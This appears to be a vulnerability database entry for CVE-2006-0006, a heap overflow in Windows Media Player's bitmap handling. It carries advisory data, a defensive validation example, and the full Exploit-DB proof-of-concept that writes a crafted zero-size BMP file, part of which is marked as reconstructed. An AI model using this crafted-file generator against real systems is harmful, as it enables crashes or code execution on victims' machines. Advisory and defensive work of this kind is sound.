CVE-2006-0006
CVSS 9.3
Published: 2006-02-14 17:06:00
Revised: 2017-07-10 21:33:20
NMCOES

[Original] Heap-based buffer overflow in the bitmap processing routine in Microsoft Windows Media Player 7.1 on Windows 2000 SP4, Media Player 9 on Windows 2000 SP4 and XP SP1, and Media Player 10 on XP SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted bitmap (.BMP) file that specifies a size of 0 but contains additional data.


[CNNVD] Microsoft Windows Media Player Malformed Bitmap File Handling Heap Overflow Vulnerability (CNNVD-200602-197)

        Microsoft Windows Media Player is a very popular media player.
        Microsoft Windows Media Player contains a vulnerability in its handling of malformed bitmap files that an attacker may exploit to execute arbitrary instructions on the user's machine. Windows Media Player can open bitmap files (such as .bmp files) and decodes them, but it does not correctly handle a bmp file whose header declares a size of 0. In that case WMP allocates a heap buffer of size 0 and then copies data into it using the actual length of the file, so a bmp file that declares a size of 0 while carrying extra data overflows the buffer. An attacker who tricks a user into opening a specially crafted bitmap file with Windows Media Player can execute arbitrary instructions with that user's privileges.
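The allocate-from-declared-size, copy-actual-length pattern described above, beside the header validation a hardened bitmap loader would perform before touching the pixel data. This is an added example written for this page, not code from Windows Media Player, eEye or the PoC author. The page does not name the WMP header field that drove the zero-sized allocation, so the vulnerable-pattern model assumes bfOffBits (the field the PoC on this page zeroes) as the declared size; the two sample files are constructed in the code, the well-formed one as a 1x1 24-bit image and the crafted one mirroring the PoC layout ("BM", bfSize equal to the real length, bfOffBits = 0, biSize = 0, body filled with 0x41) at a smaller size. Function and constant names are the example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BMP_FILE_HDR_LEN 14u   /* BITMAPFILEHEADER */
#define BMP_INFO_HDR_LEN 40u   /* BITMAPINFOHEADER */

/* Results of bmp_validate(). */
enum bmp_status {
    BMP_OK = 0,
    BMP_ERR_TRUNCATED = -1,   /* fewer bytes than the two fixed headers */
    BMP_ERR_MAGIC = -2,       /* bfType is not "BM" */
    BMP_ERR_ZERO_SIZE = -3,   /* bfOffBits or biSize is 0: the crafted-file case */
    BMP_ERR_OFFSET = -4,      /* bfOffBits lands inside the headers or past the file */
    BMP_ERR_LENGTH = -5,      /* declared sizes disagree with the bytes actually present */
    BMP_ERR_DIMENSIONS = -6   /* width/height/bitcount need more pixel bytes than present */
};

/* Little-endian field access; no packed structs needed. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Model of the vulnerable pattern: the heap buffer is sized from a size the file declares,
 * while the copy uses what the file actually contains. ASSUMPTION: bfOffBits stands in for
 * the declared size; the bytes beyond that offset are the actual data. Returns how many
 * bytes such a copy would write past the buffer (0 = none). No copy is performed. */
size_t bmp_overflow_if_header_trusted(const uint8_t *buf, size_t len) {
    if (len < BMP_FILE_HDR_LEN) return 0;
    size_t declared = rd32(buf + 10);                    /* bfOffBits */
    size_t actual = declared < len ? len - declared : 0; /* bytes really present */
    return actual > declared ? actual - declared : 0;
}

/* Hardened form: every size the file declares is checked against the bytes present before
 * any allocation or copy, with the pixel-size arithmetic done without 32-bit overflow. */
enum bmp_status bmp_validate(const uint8_t *buf, size_t len) {
    if (len < BMP_FILE_HDR_LEN + BMP_INFO_HDR_LEN) return BMP_ERR_TRUNCATED;
    if (rd16(buf) != 0x4D42) return BMP_ERR_MAGIC;
    uint32_t bf_size = rd32(buf + 2), bf_off = rd32(buf + 10);
    const uint8_t *ih = buf + BMP_FILE_HDR_LEN;
    uint32_t bi_size = rd32(ih);
    int32_t width = (int32_t)rd32(ih + 4), height = (int32_t)rd32(ih + 8);
    uint16_t planes = rd16(ih + 12), bpp = rd16(ih + 14);
    uint32_t compression = rd32(ih + 16), size_image = rd32(ih + 20);

    if (bf_off == 0 || bi_size == 0) return BMP_ERR_ZERO_SIZE;
    if (bi_size < BMP_INFO_HDR_LEN || bi_size > len - BMP_FILE_HDR_LEN) return BMP_ERR_LENGTH;
    if (bf_off < BMP_FILE_HDR_LEN + bi_size || bf_off > len) return BMP_ERR_OFFSET;
    if (bf_size != len) return BMP_ERR_LENGTH;
    if (width <= 0 || height == 0 || planes != 1 || compression != 0) return BMP_ERR_DIMENSIONS;
    if (bpp != 1 && bpp != 4 && bpp != 8 && bpp != 16 && bpp != 24 && bpp != 32) return BMP_ERR_DIMENSIONS;
    uint64_t stride = (((uint64_t)width * bpp + 31) / 32) * 4;   /* rows are padded to 4 bytes */
    uint64_t rows = height < 0 ? (uint64_t)(-(int64_t)height) : (uint64_t)height;
    uint64_t available = (uint64_t)len - bf_off;
    if (stride > available / rows) return BMP_ERR_DIMENSIONS;   /* stride*rows would exceed available */
    if (size_image != 0 && size_image > available) return BMP_ERR_LENGTH;
    return BMP_OK;
}

/* Constructed sample files (not real captures). crafted=0: a well-formed 1x1 24-bit image,
 * 58 bytes. crafted=1: the PoC layout at 256 bytes, bfOffBits = 0 and biSize = 0, body 0x41. */
size_t bmp_build_sample(uint8_t *out, size_t cap, int crafted) {
    const size_t hdr = BMP_FILE_HDR_LEN + BMP_INFO_HDR_LEN;
    size_t total = crafted ? 256 : hdr + 4;          /* one 3-byte row padded to 4 */
    if (cap < total) return 0;
    memset(out, crafted ? 0x41 : 0x00, total);
    wr16(out + 0, 0x4D42);                           /* "BM" */
    wr32(out + 2, (uint32_t)total);                  /* bfSize = real length, as in the PoC */
    wr16(out + 6, 0); wr16(out + 8, 0);
    wr32(out + 10, crafted ? 0 : (uint32_t)hdr);     /* bfOffBits */
    uint8_t *ih = out + BMP_FILE_HDR_LEN;
    wr32(ih + 0, crafted ? 0 : BMP_INFO_HDR_LEN);    /* biSize */
    if (crafted) return total;
    wr32(ih + 4, 1); wr32(ih + 8, 1);                /* 1x1 */
    wr16(ih + 12, 1); wr16(ih + 14, 24);             /* planes, 24 bpp */
    wr32(ih + 16, 0); wr32(ih + 20, 4);              /* BI_RGB, biSizeImage */
    return total;
}

/* Wrappers so each sample can be checked by name. */
enum bmp_status bmp_sample_status(int crafted) {
    uint8_t f[512];
    size_t n = bmp_build_sample(f, sizeof f, crafted);
    return n ? bmp_validate(f, n) : BMP_ERR_TRUNCATED;
}
size_t bmp_sample_overflow(int crafted) {
    uint8_t f[512];
    size_t n = bmp_build_sample(f, sizeof f, crafted);
    return bmp_overflow_if_header_trusted(f, n);
}

int main(void) {
    printf("well-formed sample: status %d, overflow %zu\n", bmp_sample_status(0), bmp_sample_overflow(0));
    printf("crafted sample:     status %d, overflow %zu\n", bmp_sample_status(1), bmp_sample_overflow(1));
    return 0;
}
```

The crafted sample is rejected with BMP_ERR_ZERO_SIZE before any size arithmetic happens, while the trusting model reports that every byte of the file would be written past a zero-length buffer. The stride check divides rather than multiplies so that a huge biWidth cannot wrap the product back into range, which is the same class of bug in a different field.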

- CVSS (base score)

CVSS score: 9.3 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be fully compromised]
Availability impact: COMPLETE [can lead to a complete system outage]
Access complexity: MEDIUM [exploitation requires some access conditions]
Access vector: NETWORK [the attacker needs neither internal-network nor local access]
Authentication: NONE [no authentication required to exploit]

- CWE (weakness category)

CWE-119 [Improper Restriction of Operations within the Bounds of a Memory Buffer]

- CPE (affected platforms and products)

cpe:/a:microsoft:windows_media_player:9  (Microsoft Windows Media Player 9)
cpe:/o:microsoft:windows_2000::sp1  (Microsoft Windows 2000 SP1)
cpe:/a:microsoft:windows_media_player:10  (Microsoft Windows Media Player 10)
cpe:/o:microsoft:windows_me  (Microsoft Windows ME)
cpe:/o:microsoft:windows_xp::sp1:tablet_pc  (Microsoft Windows XP SP1 Tablet PC)
cpe:/o:microsoft:windows_2000::sp4::fr  (Microsoft Windows 2000 SP4, French)
cpe:/o:microsoft:windows_98::gold  (Microsoft Windows 98 Gold)
cpe:/a:microsoft:windows_media_player:7.1  (Microsoft Windows Media Player 7.1)
cpe:/o:microsoft:windows_98se  (Microsoft Windows 98 SE)
cpe:/o:microsoft:windows_2003_server:r2  (Microsoft Windows Server 2003 R2)
cpe:/o:microsoft:windows_xp::sp2:tablet_pc  (Microsoft Windows XP SP2 Tablet PC)

- OVAL (technical details for detection)

oval:org.mitre.oval:def:1661  Windows Media Player 9 Bitmap Remote Code Execution
oval:org.mitre.oval:def:1578  Windows Media Player 7.10 Bitmap Remote Code Execution
oval:org.mitre.oval:def:1256  Windows Media Player 8 Bitmap Remote Code Execution
oval:gov.nist.fdcc.patch:def:11532  MS06-005: Vulnerability in Windows Media Player Could Allow Remote Code Execution (911565)
oval:gov.nist.USGCB.patch:def:11532  MS06-005: Vulnerability in Windows Media Player Could Allow Remote Code Execution (911565)
*OVAL describes how to detect this vulnerability in detail; the OVAL definitions above give the technical details of the checks.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0006
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0006
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200602-197
(official data source) CNNVD

- Other links and resources

http://securityreason.com/securityalert/423
(UNKNOWN)  SREASON  423
http://securitytracker.com/id?1015627
(PATCH)  SECTRACK  1015627
http://www.eeye.com/html/research/advisories/AD20060214.html
(VENDOR_ADVISORY)  MISC  http://www.eeye.com/html/research/advisories/AD20060214.html
http://www.kb.cert.org/vuls/id/291396
(VENDOR_ADVISORY)  CERT-VN  VU#291396
http://www.microsoft.com/technet/security/bulletin/ms06-005.mspx
(VENDOR_ADVISORY)  MS  MS06-005
http://www.securityfocus.com/archive/1/archive/1/424983/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060214 [EEYEB-20051017] Windows Media Player BMP Heap Overflow
http://www.securityfocus.com/archive/1/archive/1/425158/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060215 Windows Media Player BMP Heap Overflow (MS06-005)
http://www.securityfocus.com/bid/16633
(PATCH)  BID  16633
http://www.us-cert.gov/cas/techalerts/TA06-045A.html
(VENDOR_ADVISORY)  CERT  TA06-045A
http://www.vupen.com/english/advisories/2006/0574
(VENDOR_ADVISORY)  VUPEN  ADV-2006-0574
https://exchange.xforce.ibmcloud.com/vulnerabilities/24488
(UNKNOWN)  XF  win-media-player-bmp-bo(24488)

- Vulnerability information

Microsoft Windows Media Player Malformed Bitmap File Handling Heap Overflow Vulnerability
High severity  Buffer overflow
Published 2006-02-14 00:00:00  Updated 2006-10-30 00:00:00
Remote

- Advisories and patches

        The vendor has released security updates that fix this issue; download links:
        http://www.microsoft.com/downloads/details.aspx?FamilyId=26A0B9E1-1242-4E55-B3D4-8377B83257C6
        http://www.microsoft.com/downloads/details.aspx?FamilyId=8F9EEF16-04F7-4DA8-A0EF-1797B52D0B4B
        http://www.microsoft.com/downloads/details.aspx?FamilyId=182735E1-9382-4F2E-A624-D2316A96B411

- Exploit (Exploit-DB 1500)

Windows Media Player 7.1 <= 10 BMP Heap Overflow PoC (MS06-005) (EDBID:1500)
Platform: windows  Type: dos
Date: 2006-02-15 (Verified)
Author: ATmaCA
/*
* For remote exploitation (hint):
* http://www.spyinstructors.com/atmaca/research/wmp_remote_poc.asx
*/

/*
*
* Windows Media Player BMP Heap Overflow (MS06-005)
* Bug discovered by eEye - http://www.eeye.com/html/research/advisories/AD20060214.html
* Exploit coded by ATmaCA
* Web: http://www.spyinstructors.com  && http://www.atmacasoft.com
* E-Mail: atmaca@icqmail.com
* Credit to Kozan
*
*/

/*
*
* Systems Affected:
* Microsoft Windows Media Player 7.1 through 10
*
* Windows NT 4.0
* Windows 98 / ME
* Windows 2000 SP4
* Windows XP SP1 / SP2
* Windows 2003
*
*
*/

/*
*
* In this vulnerability, the payload is loaded to a different place in memory each time,
* but sometimes it is very easy to call our shell code:
* http://www.spyinstructors.com/atmaca/research/wmp.JPG
* but sometimes not =) because of that, no shell this time.
*
*/

/*
*
* Microsoft has released a patch for this vulnerability.
* The patch is available at:
* http://www.microsoft.com/technet/security/bulletin/ms06-005.mspx
*
*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   // malloc(), free(), exit()
#include <string.h>   // memset()

#define BITMAP_FILE_SIZE        0xA8D2
#define BITMAP_FILE_NAME        "crafted.bmp"

#pragma pack( push )
#pragma pack( 1 )

// bitmap file format - http://atlc.sourceforge.net/bmp.html
// File information header provides general information about the file
typedef struct _BitmapFileHeader {
  WORD    bfType;
  DWORD   bfSize;
  WORD    bfReserved1;
  WORD    bfReserved2;
  DWORD   bfOffBits;
} BMPFHEADER;

// Bitmap information header provides information specific to the image data
typedef struct _BitmapInfoHeader{
  DWORD  biSize;
  LONG   biWidth;
  LONG   biHeight;
  WORD   biPlanes;
  WORD   biBitCount;
  DWORD  biCompression;
  DWORD  biSizeImage;
  LONG   biXPelsPerMeter;
  LONG   biYPelsPerMeter;
  DWORD  biClrUsed;
  DWORD  biClrImportant;
} BMPIHEADER;

#pragma pack( pop )

int main(void)
{
        FILE *File;
        BMPFHEADER *bmp_fheader;
        BMPIHEADER *bmp_iheader;
        char *pszBuffer;

        printf("\nWindows Media Player BMP Heap Overflow (MS06-005)");
        printf("\nBug discovered by eEye");
        printf("\nExploit coded by ATmaCA");
        printf("\nWeb: http://www.spyinstructors.com  && http://www.atmacasoft.com");
        printf("\nE-Mail: atmaca@icqmail.com");
        printf("\nCredit to Kozan");


        if ( (File = fopen(BITMAP_FILE_NAME,"w+b")) == NULL ) {
                printf("\n [E:] fopen()");
                exit(1);
        }

        bmp_fheader=(BMPFHEADER*)malloc(sizeof(BMPFHEADER));
        bmp_iheader=(BMPIHEADER*)malloc(sizeof(BMPIHEADER));
        pszBuffer = (char*)malloc(BITMAP_FILE_SIZE);
        if ( bmp_fheader == NULL || bmp_iheader == NULL || pszBuffer == NULL ) {
                printf("\n [E:] malloc()");
                exit(1);
        }

        // body of the file: filler bytes that the vulnerable routine copies into
        // the zero-sized heap buffer
        memset(pszBuffer,0x41,BITMAP_FILE_SIZE);

        bmp_fheader->bfType = 0x4D42; // "BM"
        bmp_fheader->bfSize = BITMAP_FILE_SIZE;
        bmp_fheader->bfReserved1 = 0x00;
        bmp_fheader->bfReserved2 = 0x00;

        // eEye - MAGIC
        // Antiviruses will get the signature from here!!!
        bmp_fheader->bfOffBits = 0x00; //( sizeof(BMPFHEADER) + sizeof(BMPIHEADER) );

        // Info header. The original listing is damaged from this point on; only the
        // declared size of 0 and the 0xA89C image size (file size minus both headers)
        // are legible in it. The remaining field values are reconstructed and are an
        // assumption of this transcription, not the author's exact values.
        bmp_iheader->biSize = 0x00; //( sizeof(BMPIHEADER) );
        bmp_iheader->biWidth = 0x1;
        bmp_iheader->biHeight = 0x1;
        bmp_iheader->biPlanes = 0x1;
        bmp_iheader->biBitCount = 0x18;
        bmp_iheader->biCompression = 0x00;
        bmp_iheader->biSizeImage = 0xA89C;
        bmp_iheader->biXPelsPerMeter = 0x00;
        bmp_iheader->biYPelsPerMeter = 0x00;
        bmp_iheader->biClrUsed = 0x00;
        bmp_iheader->biClrImportant = 0x00;

        // write both headers, then enough filler to reach BITMAP_FILE_SIZE bytes
        fwrite(bmp_fheader, sizeof(BMPFHEADER), 1, File);
        fwrite(bmp_iheader, sizeof(BMPIHEADER), 1, File);
        fwrite(pszBuffer, BITMAP_FILE_SIZE - ( sizeof(BMPFHEADER) + sizeof(BMPIHEADER) ), 1, File);
        fclose(File);

        free(pszBuffer);
        free(bmp_iheader);
        free(bmp_fheader);

        printf("\n\n[+] %s created, open it with Windows Media Player.\n", BITMAP_FILE_NAME);
        return 0;
}

// milw0rm.com [2006-02-15]